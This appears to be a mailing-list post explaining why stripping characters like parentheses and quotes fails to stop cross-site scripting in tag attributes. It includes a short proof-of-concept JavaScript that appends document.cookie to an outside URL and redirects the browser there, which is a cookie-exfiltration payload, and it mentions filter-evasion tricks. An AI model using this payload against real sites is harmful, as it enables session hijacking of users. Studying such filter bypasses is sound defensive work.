As I have said before. filtering ( and ) does nothing to stop xss if it is
printed into a tag parameter. For instance:

<img src="$userimg"> if $userimg is provided by user input.

Now even if you strip < > ( ) ' and " you can still execute javascript.

poc javascript (tested on Mozilla 0.9.9):

var u = /http:site.com?/;
var x = u.source + document.cookie;
window.location=x;

I am sure are other ways to do this. Also remember that javascript is not
the only xss language, so filtering for xss becomes next to impossible
without allowing a-zA-Z0-9 only.

I am sure someone can show you the use of # and & to circumvent xss filters,
it is used all the time. I might be writting a short paper on the topic of
javascript filter evasion, if I do I'll be sure to post it here. (I am no
javascript expert, so expect errors and obvious things done the hard way)

--
http://b0iler.eyeonsecurity.net

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]